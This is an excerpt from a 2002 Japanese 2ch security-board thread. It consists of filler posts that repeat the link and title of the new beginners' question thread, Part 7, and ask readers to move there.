http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
979埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
980埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
981埋め立て屋:02/02/26 05:49
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/
982埋め立て屋:02/02/26 05:50
新しいスレへ移動して下さい。
983埋め立て屋 ◆NA.UMERU
■ 初心者用質問スレッド Part7 ■
http://pc.2ch.net/test/read.cgi/sec/1013006745/1-7